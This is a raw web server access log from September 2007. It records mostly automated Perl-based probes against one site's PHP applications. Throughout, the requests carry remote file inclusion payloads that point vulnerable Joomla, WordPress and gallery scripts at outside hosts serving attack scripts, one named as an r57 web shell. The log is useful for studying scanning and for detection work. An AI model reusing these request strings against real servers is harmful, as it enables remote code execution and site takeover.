208.53.138.150 - - [30/Sep/2007:17:52:20 -0700] "GET /logs/access_070716.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:52:20 -0700] "GET //index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:52:20 -0700] "GET /logs//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:17:52:22 -0700] "GET /logs/access_070604.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:17:53:27 -0700] "GET /logs/manager/frontinc/prepend.php?_PX_config[manager_path]=3D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
62.149.196.76 - - [30/Sep/2007:17:53:28 -0700] "GET /manager/frontinc/prepend.php?_PX_config[manager_path]=3D=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:17:55:10 -0700] "GET /logs//plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:17:55:10 -0700] "GET //plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
85.214.59.8 - - [30/Sep/2007:17:56:05 -0700] "GET /logs/index2.php?x=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.59.8 - - [30/Sep/2007:17:56:05 -0700] "GET /index2.php?x=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.214.59.8 - - [30/Sep/2007:17:56:05 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:17:56:06 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.196.115 - - [30/Sep/2007:17:56:21 -0700] "GET /logs/access.log/index.php?inc=http://www.noforgiveness.com/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.196.115 - - [30/Sep/2007:17:56:21 -0700] "GET /index.php?inc=http://www.noforgiveness.com/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.230.196.115 - - [30/Sep/2007:17:56:21 -0700] "GET /logs/index.php?inc=http://www.noforgiveness.com/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.246.7.59 - - [30/Sep/2007:17:58:18 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.246.7.59 - - [30/Sep/2007:17:58:18 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.168.87.183 - - [30/Sep/2007:17:59:09 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
200.168.87.183 - - [30/Sep/2007:17:59:09 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
213.218.133.171 - - [30/Sep/2007:17:59:31 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shuters.africamediaonline.com/stat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.218.133.171 - - [30/Sep/2007:17:59:32 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.218.133.171 - - [30/Sep/2007:17:59:32 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shuters.africamediaonline.com/stat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.218.133.171 - - [30/Sep/2007:17:59:32 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.218.133.171 - - [30/Sep/2007:17:59:33 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://shuters.africamediaonline.com/stat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.218.133.171 - - [30/Sep/2007:17:59:33 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.196.115 - - [30/Sep/2007:17:59:43 -0700] "GET /logs/access_070716.log/index.php?inc=http://www.noforgiveness.com/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.168.87.183 - - [30/Sep/2007:18:00:14 -0700] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
200.168.124.37 - - [30/Sep/2007:18:00:24 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.168.124.37 - - [30/Sep/2007:18:00:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.freewebs.com/qmono/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:18:03:25 -0700] "GET /logs/index2.php?x=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:18:03:25 -0700] "GET /index2.php?x=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.236.253 - - [30/Sep/2007:18:04:59 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tkj-amurang.biz/swing/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.236.253 - - [30/Sep/2007:18:05:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://tkj-amurang.biz/swing/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.12.114.142 - - [30/Sep/2007:18:05:19 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
212.12.114.142 - - [30/Sep/2007:18:05:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
212.12.114.142 - - [30/Sep/2007:18:05:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
212.12.114.142 - - [30/Sep/2007:18:05:21 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.248.204 - - [30/Sep/2007:18:06:13 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
62.193.248.204 - - [30/Sep/2007:18:06:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
62.193.248.204 - - [30/Sep/2007:18:06:14 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [30/Sep/2007:18:06:14 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:18:06:16 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.158.100 - - [30/Sep/2007:18:06:16 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:18:06:50 -0700] "GET /logs/access_070716.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:18:06:50 -0700] "GET //index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:18:06:50 -0700] "GET /logs//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.141.39.206 - - [30/Sep/2007:18:07:06 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=http://watchout.by.ru/r57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.206 - - [30/Sep/2007:18:07:11 -0700] "GET /logs//components/com_securityimages/lang.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.206 - - [30/Sep/2007:18:07:17 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=http://watchout.by.ru/r57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.141.39.206 - - [30/Sep/2007:18:07:22 -0700] "GET //components/com_securityimages/lang.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
200.216.238.230 - - [30/Sep/2007:18:09:02 -0700] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ilegaistcl.xpg.com.br/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.216.238.230 - - [30/Sep/2007:18:09:03 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ilegaistcl.xpg.com.br/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:18:09:13 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ilegais.110mb.com/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:18:09:13 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:18:09:13 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ilegais.110mb.com/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.27.33 - - [30/Sep/2007:18:09:27 -0700] "GET /logs/access_070910.log//modules/agendax/addevent.inc.php?agendax_path=http://sindromx.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.27.33 - - [30/Sep/2007:18:09:28 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://sindromx.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.27.33 - - [30/Sep/2007:18:09:28 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://sindromx.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.216.238.230 - - [30/Sep/2007:18:10:35 -0700] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.ilegaistcl.xpg.com.br/res.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
213.79.164.220 - - [30/Sep/2007:18:12:38 -0700] "GET /modules/My_eGallery/index.php?basepath=http://shuters.africamediaonline.com/stat.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.79.164.220 - - [30/Sep/2007:18:12:38 -0700] "GET /modules/My_eGallery/index.php?basepath=? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:18:14:57 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.101.170.85 - - [30/Sep/2007:18:14:57 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.26.50 - - [30/Sep/2007:18:16:29 -0700] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://sindromx.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.230.26.50 - - [30/Sep/2007:18:16:29 -0700] "GET //modules/agendax/addevent.inc.php?agendax_path=http://sindromx.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.149.196.76 - - [30/Sep/2007:18:16:32 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
62.149.196.76 - - [30/Sep/2007:18:16:33 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.246.7.59 - - [30/Sep/2007:18:17:11 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.246.7.59 - - [30/Sep/2007:18:17:11 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.27.33 - - [30/Sep/2007:18:17:31 -0700] "GET /logs/access_070702.log//modules/agendax/addevent.inc.php?agendax_path=http://sindromx.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.105.190.105 - - [30/Sep/2007:18:18:11 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://search-engineoptimization.biz/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
59.105.190.105 - - [30/Sep/2007:18:18:11 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://search-engineoptimization.biz/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
59.105.190.105 - - [30/Sep/2007:18:18:12 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://search-engineoptimization.biz/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
59.105.190.105 - - [30/Sep/2007:18:18:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://search-engineoptimization.biz/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.53.138.150 - - [30/Sep/2007:18:19:17 -0700] "GET /logs/access.log//index.php?p=http://lebrat.com/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.241.168.249 - - [30/Sep/2007:18:19:20 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.241.168.249 - - [30/Sep/2007:18:19:21 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.241.168.249 - - [30/Sep/2007:18:19:21 -0700] "GET //skin/zero_vote/error.php?dir=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.241.168.249 - - [30/Sep/2007:18:19:22 -0700] "GET //skin/zero_vote/error.php?dir=http://71.102.93.10/WTS/bin/hak/idpitbull.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.8.221.178 - - [30/Sep/2007:18:20:19 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://h1.ripway.com/s4w/eval.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
58.126.183.5 - - [30/Sep/2007:18:21:03 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.126.183.5 - - [30/Sep/2007:18:21:03 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
58.126.183.5 - - [30/Sep/2007:18:21:09 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.126.183.5 - - [30/Sep/2007:18:21:13 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:18:21:27 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.59.8 - - [30/Sep/2007:18:21:27 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.230.196.115 - - [30/Sep/2007:18:21:39 -0700] "GET /logs/access_070826.log/index.php?inc=http://www.noforgiveness.com/public/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.106.179.35 - - [30/Sep/2007:18:21:51 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.179.35 - - [30/Sep/2007:18:21:51 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.179.35 - - [30/Sep/2007:18:22:00 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.106.179.35 - - [30/Sep/2007:18:22:00 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:22:07 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:22:08 -0700] "GET /logs/access_070806.log/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:22:08 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:22:08 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:22:09 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:18:22:16 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:18:22:17 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ilegais.110mb.com/ilg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:18:22:19 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ilegais.110mb.com/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:18:22:19 -0700] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ilegais.110mb.com/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:18:22:19 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ilegais.110mb.com/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.186.94.51 - - [30/Sep/2007:18:22:20 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ilegais.110mb.com/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.55.7.214 - - [30/Sep/2007:18:23:12 -0700] "GET /logs//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://servercom1245.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
89.55.7.214 - - [30/Sep/2007:18:23:14 -0700] "GET //wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://servercom1245.tripod.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:18:23:51 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.80.10 - - [30/Sep/2007:18:23:51 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kinkware.com/shop/pub/error.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.157.15.26 - - [30/Sep/2007:18:23:56 -0700] "GET /logs/access_070430.log HTTP/1.1" 200 225841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
64.157.15.26 - - [30/Sep/2007:18:24:01 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
64.157.15.26 - - [30/Sep/2007:18:24:15 -0700] "GET /logs/ HTTP/1.1" 200 5085 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
64.157.15.26 - - [30/Sep/2007:18:24:28 -0700] "GET /logs/scripts.log HTTP/1.1" 200 79060 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
64.157.15.26 - - [30/Sep/2007:18:24:52 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
84.246.7.59 - - [30/Sep/2007:18:24:55 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.157.15.26 - - [30/Sep/2007:18:24:56 -0700] "GET /labia/ HTTP/1.1" 200 524 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
84.246.7.59 - - [30/Sep/2007:18:24:58 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.ilegais.110mb.com/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.157.15.26 - - [30/Sep/2007:18:25:00 -0700] "GET /tmp/ HTTP/1.1" 200 520 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
64.157.15.26 - - [30/Sep/2007:18:25:04 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
72.29.90.201 - - [30/Sep/2007:18:26:13 -0700] "GET /logs/access_070806.log/index.php?x=http://www.buxombombardiers.com/modules/vwar/images/locations/sc? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.90.201 - - [30/Sep/2007:18:26:13 -0700] "GET /index.php?x=http://www.buxombombardiers.com/modules/vwar/images/locations/sc? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.29.90.201 - - [30/Sep/2007:18:26:13 -0700] "GET /logs/index.php?x=http://www.buxombombardiers.com/modules/vwar/images/locations/sc? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:27:06 -0700] "GET /logs/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:27:14 -0700] "GET /index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.57.31.22 - - [30/Sep/2007:18:27:15 -0700] "GET /logs/access_070806.log/index2.php?url_page=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
